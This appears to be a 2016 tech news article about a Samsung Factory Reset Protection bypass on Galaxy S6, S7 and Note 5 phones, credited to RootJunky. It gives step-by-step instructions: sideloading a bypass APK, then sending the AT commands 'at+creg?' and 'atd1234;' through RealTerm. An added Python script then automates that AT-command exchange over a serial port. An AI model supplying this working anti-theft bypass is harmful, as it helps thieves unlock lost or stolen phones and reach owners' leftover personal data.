Aug 12th, 2016

Another security nightmare has surfaced for Samsung. The company's smartphones (along with many others, including Nexus phones) were under fire earlier this year when it was discovered that you could bypass the factory reset protection feature without having the Google account credentials of the phone's previous owner.

While that exploit was eventually fixed, another has surfaced that shows it's possible to crack into several protected Samsung devices, including the Samsung Galaxy S6, S6 Edge, S6 Edge Plus, S6 Active, Note 5, S7, S7 Edge, and S7 Active, with a little bit of work. But before we give you the full rundown, let's review factory reset protection (or FRP, as we'll be calling it for the rest of this article) and what it does.

What is Factory Reset Protection?

Factory Reset Protection, or FRP, is a feature Android introduced with the 5.0 Lollipop release. In simple terms, FRP requires you to enter the credentials of the Google account that was last signed in on the phone before you can get past the setup wizard after a factory reset that the owner did not perform from Settings (for example, a reset done from recovery).

This option was put in place to prevent unwanted people from accessing a phone after factory resetting it, which is useful for a couple of different reasons:

  • Depending on how a factory reset is performed, not all data is necessarily erased. For instance, the storage partition holding your photos and videos may survive the reset. FRP keeps whoever wiped the phone from getting at whatever is left, which matters to anyone who loses a device with personal files on it.
  • It makes the phone virtually unusable: a stolen or lost phone that no one can get into is worth little to a thief. Someone with the technical know-how can get around it anyway, but it keeps everyone else at bay.

It’s designed to help keep your private life private in the event that you can’t ever get your phone back.

Bypassing FRP on Samsung’s phones


So, those who do want to bypass it now have an easy (if slightly involved) way to do so, and all it requires is the ability to follow instructions. RootJunky, who brought this exploit to light along with the one that surfaced back in January, lays it all out below.

Here’s what you’ll need:

  • The phone
  • A Windows computer
  • The ability to follow directions

Good to go? Here’s what you’ll need to do:

  1. Download and install the RealTerm program.
  2. Download com.rootjunky.frpbypass-1.0.apk and copy it to the device's microSD card or internal storage.
  3. Start the phone and connect it to Wi-Fi.
  4. Plug the phone into your computer with your USB cable.
  5. Start RealTerm on your computer and, under "Display," check the box "HALF DUPLEX."
  6. Right-click "My Computer" and select "Manage." Once it opens, click "Device Manager," then "Modems."
  7. Under Modems you should see a Samsung device. Right-click it, then select "Properties."
  8. Once the properties window opens, select the "Modem" tab and note which port your device is on (for example, it may show up as "COM5").
  9. Now that you know the COM port number, close all Device Manager windows and go back to RealTerm.
  10. Under the "Port" tab in RealTerm, enter your port number, then click "Change."
  11. Next, click the "Send" tab. You will need to send these two commands, in order, with the "Send ASCII" button (the modem treats AT commands case-insensitively, and the \r\n is the carriage return and line feed that terminate each command):
    1. first at+creg?\r\n
    2. then atd1234;\r\n
  12. Look at your phone: the dialer will pop up, even though the device is still sitting at the FRP lock screen.

From there, all you'll need to do is mimic what you see in the video below.
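The RealTerm steps above are just a manual way of typing two AT commands at the phone's USB modem interface. The following is an added example, not RootJunky's tool or anything from the original write-up: it replays the same exchange in Python over an abstract transport, parses the +CREG? registration reply, and reports whether the modem accepted the dial command. The transport only needs write() and readline() on bytes; a pyserial Serial object opened on the COM port from step 8 is assumed to fit that interface, but the block ships with a constructed fake modem so it runs offline.

```python
"""Replay the two-command AT exchange from the FRP bypass write-up.

Added example, not RootJunky's code. The transport is abstracted so the
exchange can be exercised offline against a constructed fake modem; on a
real phone you would pass an object such as pyserial's Serial (assumed to
provide write()/readline()) opened on the modem's COM port.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Protocol


class Transport(Protocol):
    """Anything exposing write()/readline() on bytes (e.g. pyserial Serial, assumed)."""
    def write(self, data: bytes) -> int: ...
    def readline(self) -> bytes: ...


# The two commands the article sends, including the CR LF terminator.
CREG_QUERY = b"AT+CREG?\r\n"
DIAL_1234 = b"ATD1234;\r\n"   # trailing ';' makes it a voice call, which pops the dialer

_CREG_RE = re.compile(rb"\+CREG:\s*(\d+),\s*(\d+)")

# 3GPP 27.007 <stat> values returned by +CREG?
CREG_STATUS = {
    0: "not registered, not searching",
    1: "registered, home network",
    2: "not registered, searching",
    3: "registration denied",
    4: "unknown",
    5: "registered, roaming",
}


def send_at(port: Transport, command: bytes, max_lines: int = 20) -> list[bytes]:
    """Send one AT command and collect response lines up to the final OK/ERROR."""
    port.write(command)
    lines: list[bytes] = []
    for _ in range(max_lines):
        line = port.readline().strip()
        if not line or line == command.strip():   # skip blank lines and command echo
            continue
        lines.append(line)
        if line in (b"OK", b"ERROR") or line.startswith(b"+CME ERROR"):
            return lines
    raise TimeoutError("no final result code from modem")


def parse_creg(lines: list[bytes]) -> int | None:
    """Return the <stat> field from a +CREG? response, or None if it is absent."""
    for line in lines:
        m = _CREG_RE.match(line)
        if m:
            return int(m.group(2))
    return None


def run_bypass_sequence(port: Transport) -> dict:
    """Replay the article's two steps and report what the modem answered."""
    stat = parse_creg(send_at(port, CREG_QUERY))
    dial = send_at(port, DIAL_1234)
    return {
        "registered": stat in (1, 5),
        "creg_status": CREG_STATUS.get(stat, "no +CREG reply"),
        "dial_accepted": dial[-1] == b"OK",
    }


@dataclass
class FakeSamsungModem:
    """Constructed stand-in for the phone's USB modem port; answers only these commands."""
    registered: bool = True
    sent: list[bytes] = field(default_factory=list)
    _queue: list[bytes] = field(default_factory=list)

    def write(self, data: bytes) -> int:
        self.sent.append(data)
        cmd = data.strip().upper()
        if cmd == b"AT+CREG?":
            stat = b"1" if self.registered else b"0"
            self._queue += [b"\r\n", b"+CREG: 0," + stat + b"\r\n", b"\r\n", b"OK\r\n"]
        elif cmd.startswith(b"ATD"):
            self._queue += [b"\r\n", b"OK\r\n"]
        else:
            self._queue += [b"\r\n", b"ERROR\r\n"]
        return len(data)

    def readline(self) -> bytes:
        return self._queue.pop(0) if self._queue else b""


if __name__ == "__main__":
    print(run_bypass_sequence(FakeSamsungModem()))
```

The point the fake modem makes visible is that nothing in the exchange authenticates the caller: the dial command is accepted on the strength of being sent to the port, which is exactly why the dialer appears on a phone that is still FRP-locked.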

When will Samsung fix it?

As you can see, the method is a lot more involved than the previous one, but it's achievable all the same, and that's a pretty big problem. The underlying issue is that the phone's USB modem interface accepts AT commands, including a dial command, while the device is still FRP-locked, and the dialer that pops up gives a path out of the locked setup wizard. Samsung is surely going to want to get a handle on this one just as fast as it did before, so we'll be dropping the company a line to see whether it's aware of the issue and whether a fix is on the way.

[via RootJunky]